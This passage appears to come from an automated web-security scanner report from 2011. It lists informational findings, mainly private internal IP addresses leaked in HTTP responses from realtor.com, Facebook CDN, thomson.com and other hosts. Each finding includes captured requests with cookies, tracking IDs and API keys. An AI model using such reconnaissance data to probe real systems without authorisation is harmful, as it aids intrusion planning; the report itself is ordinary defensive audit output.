User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1303855598284-166145#1303858211|PC#1303855598284-166145#1366928351|check#true#1303856411; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:38:58 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.6 mod_fastcgi/2.4.6 mod_perl/2.0.4 Perl/v5.8.7
Last-Modified: Fri, 22 Apr 2011 14:18:27 GMT
Accept-Ranges: bytes
Content-Length: 21915
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <script src="/art/bw06/r
...[SNIP]...
<a href="mailto:BBPublicity@randomhouse.com">BBPublicity@randomhouse.com</a>
...[SNIP]...
<a href="mailto:bdpublicity@randomhouse.com">bdpublicity@randomhouse.com</a>
...[SNIP]...
<a href="mailto:bdpublicity@randomhouse.com">bdpublicity@randomhouse.com</a>
...[SNIP]...
<a href="mailto:crownpublicity@randomhouse.com">crownpublicity@randomhouse.com</a>
...[SNIP]...
<a href="mailto:ddaypub@randomhouse.com">ddaypub@randomhouse.com</a>
...[SNIP]...
<a href="mailto:knopfpublicity@randomhouse.com">knopfpublicity@randomhouse.com</a>
...[SNIP]...
<a href="mailto:pantheonpublicity@randomhouse.com">pantheonpublicity@randomhouse.com</a>
...[SNIP]...
<a href="mailto:audio@randomhouse.com">audio@randomhouse.com</a>
...[SNIP]...
<a href="mailto:atrandompublicity@randomhouse.com">atrandompublicity@randomhouse.com</a>
...[SNIP]...
<a href="mailto:vintageanchorpublicity@randomhouse.com">vintageanchorpublicity@randomhouse.com</a>
...[SNIP]...
<a href="mailto:ecustomerservice@randomhouse.com">ecustomerservice@randomhouse.com</a>
...[SNIP]...
<a href="mailto:webmaster@randomhouse.com">webmaster@randomhouse.com</a>
...[SNIP]...

25. Private IP addresses disclosed  previous  next
There are 34 instances of this issue:


25.1. http://c.homestore.com/srv/oreo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.homestore.com
Path:   /srv/oreo

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /srv/oreo?c.realtor.com HTTP/1.1
Host: c.homestore.com
Proxy-Connection: keep-alive
Referer: http://www.realtor.com/search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 18:46:19 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_jk/1.2.5
P3P: CP='COR CURa ADMo DEVo PSAo PSDo TAIo OUR'
Set-Cookie: HSID=561c652c36_R_63:10.160.4.250:369843579958:R; Domain=.homestore.com; Expires=Fri, 02-Jan-2043 20:32:59 GMT; Path=/
Location: http://c.realtor.com/srv/sugar?hsid=561c652c36_R_63:10.160.4.250:369843579958:R
Content-Length: 225
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1

<html><head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://c.realtor.com/srv/sugar?hsid=561c652c36_R_63:10.160.4.250:369843579958:R">here<
...[SNIP]...

25.2. http://c.realtor.com/srv/sugar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.realtor.com
Path:   /srv/sugar

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /srv/sugar?hsid=561c65cde6_R_a8:10.160.4.250:369843621350:R HTTP/1.1
Host: c.realtor.com
Proxy-Connection: keep-alive
Referer: http://www.realtor.com/search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: criteria=sby=3&loc=75207&usrloc=75207&typ=3&status=1; recAlertSearch=recAlertShown=false&sameSrch=false&saveLstCnt=0&sid=; RecentSearch=loc%3dNew+York%2c+NY%26typ%3d3%26mnp%3d%26mxp%3d%26bd%3d0%26bth%3d0%26status%3d1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:22 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_jk/1.2.5
P3P: CP='COR CURa ADMo DEVo PSAo PSDo TAIo OUR'
Set-Cookie: HSID=561c65cde6_R_a8:10.160.4.250:369843621350:R; Domain=.realtor.com; Expires=Fri, 02-Jan-2043 20:33:02 GMT; Path=/
nnCoection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

25.3. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.widgetserver.com
Path:   /p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750?token=095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168 HTTP/1.1
Host: p.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=48916
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=900,public
Content-Type: application/atom+xml
Date: Tue, 26 Apr 2011 21:45:03 GMT
Last-Modified: Tue, 26 Apr 2011 21:45:03 GMT
Server: ECS (dca/533B)
X-Cache: HIT
Content-Length: 45545

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:activity="http://activitystrea.ms/spec/1.0/" xmlns:fb="http://www.facebook.com" xmlns:access="http://www.blogline
...[SNIP]...
<!-- SUDA was here. 10.54.219.60 -->
...[SNIP]...

25.4. http://reviews.west.thomson.com/logging  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reviews.west.thomson.com
Path:   /logging

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /logging?page=http%3A//reviews.west.thomson.com/8456/160547/reviews.htm%3Fformat%3Dembedded HTTP/1.1
Host: reviews.west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/plain;charset=utf-8
Vary: Accept-Encoding
Expires: Tue, 26 Apr 2011 20:03:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 26 Apr 2011 20:03:37 GMT
Connection: close
Set-Cookie: ARPT=WYZMZMS10.10.32.20CKKLK; path=/
Content-Length: 45

Captured page load timeout at 4/26/11 3:03 PM

25.5. http://static.ak.connect.facebook.com/connect.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=2c9e5bbe7f56d18fa0b9532bc94c9016&extern=0&channel=http%3A%2F%2Fmoxieinsight.com%2F%3Fxd_receiver%3D1&locale=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "ab8a6e70ae1ee0128bf1811f5d95f63a"
X-FB-Server: 10.27.152.106
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1062
Expires: Tue, 26 Apr 2011 21:15:14 GMT
Date: Tue, 26 Apr 2011 20:57:32 GMT
Connection: close
Content-Length: 18453

/*1303256049,169580650,JIT Construction: v368160,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

25.6. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
ETag: "4cee9fd4a0927297616c6d703f3dd063"
X-FB-Server: 10.32.112.109
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=922
Expires: Tue, 26 Apr 2011 21:12:52 GMT
Date: Tue, 26 Apr 2011 20:57:30 GMT
Connection: close
Content-Length: 14288

/*1303255385,169898093,JIT Construction: v368160,en_US*/

.FB_UIButton{background-image:url(/images/ui/UIActionButton_ltr.png);border-style:solid;border-width:1px;display:-moz-inline-box;display:inlin
...[SNIP]...

25.7. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "e63f46c6c5f89385ad012fbf4a8f89f2"
X-FB-Server: 10.32.130.132
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=148
Expires: Tue, 26 Apr 2011 20:59:57 GMT
Date: Tue, 26 Apr 2011 20:57:29 GMT
Connection: close
Content-Length: 211448

/*1303256097,169902724,JIT Construction: v368160,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

25.8. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4 HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "ab8a6e70ae1ee0128bf1811f5d95f63a"
X-FB-Server: 10.27.93.114
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=623
Expires: Tue, 26 Apr 2011 21:13:48 GMT
Date: Tue, 26 Apr 2011 21:03:25 GMT
Connection: close
Content-Length: 18453

/*1303576578,169565554,JIT Construction: v369850,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

25.9. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/XdCommReceiver.js HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/?xd_receiver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.30.145.198
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: max-age=1188143
Expires: Tue, 10 May 2011 14:59:57 GMT
Date: Tue, 26 Apr 2011 20:57:34 GMT
Connection: close
Content-Length: 3386

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver
* @requi
...[SNIP]...

25.10. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.69.185
Vary: Accept-Encoding
Cache-Control: public, max-age=1336
Expires: Tue, 26 Apr 2011 19:01:48 GMT
Date: Tue, 26 Apr 2011 18:39:32 GMT
Connection: close
Content-Length: 3020

<!doctype html>
<html>


<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; h
...[SNIP]...

25.11. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.193
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=239
Expires: Tue, 26 Apr 2011 21:50:21 GMT
Date: Tue, 26 Apr 2011 21:46:22 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

25.12. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 02 Mar 2011 05:39:30 GMT
Content-Length: 3031
Content-Type: application/x-shockwave-flash
X-FB-Server: 10.138.69.185
Cache-Control: public, max-age=594529
Expires: Tue, 03 May 2011 15:48:44 GMT
Date: Tue, 26 Apr 2011 18:39:55 GMT
Connection: close

CWS
....x.}X.w...W_O...N..E@.CB...f.d |$qH.0.....,.O..Y..r...Ci..]t........z.j{...N    g.?.....}.C..S.........k.l..3B:v...d6.G.......z..Z....5.mL...p..7.........c^}=;~...ln";1q.9.4....}.m........U.n.U..
...[SNIP]...

25.13. http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/FGFbc80dUKj.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zL/r/FGFbc80dUKj.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zL/r/FGFbc80dUKj.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1916
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 01:13:36 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.182
Cache-Control: public, max-age=27858464
Expires: Wed, 14 Mar 2012 08:14:16 GMT
Date: Tue, 26 Apr 2011 21:46:32 GMT
Connection: close

.PNG
.
...IHDR...'.........b_Ci....PLTE...Oj.r..y..z...5nEa.z.....{..|........ay.......F_...................{..m........D^....@Z.B[....E^.C].......@Z.p..Le....p...........C].B\.............A[.......
...[SNIP]...

25.14. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=3686c957ae60aac15538bbb525943089&app_id=3686c957ae60aac15538bbb525943089&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df14544f77%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff76faa51c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f6f605a4%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff76faa51c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df205380958%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e717af24%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff76faa51c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df205380958&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df22af45b3c%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff76faa51c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df205380958&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df311a93cb4%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff76faa51c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df205380958&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f22af45b3c&origin=http%3A%2F%2Fwww.widgetbox.com%2Ff76faa51c&relation=parent&transport=postmessage&frame=f205380958
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.228.64
X-Cnection: close
Date: Tue, 26 Apr 2011 21:46:51 GMT
Content-Length: 0


25.15. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=3686c957ae60aac15538bbb525943089&app_id=3686c957ae60aac15538bbb525943089&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcc1af0c%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ffe718eb0%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df144b30f04%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ffe718eb0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df120e2df28%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dffe3ee7ac%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ffe718eb0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df120e2df28&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a9934924%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ffe718eb0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df120e2df28&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11b7881fc%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ffe718eb0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df120e2df28&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
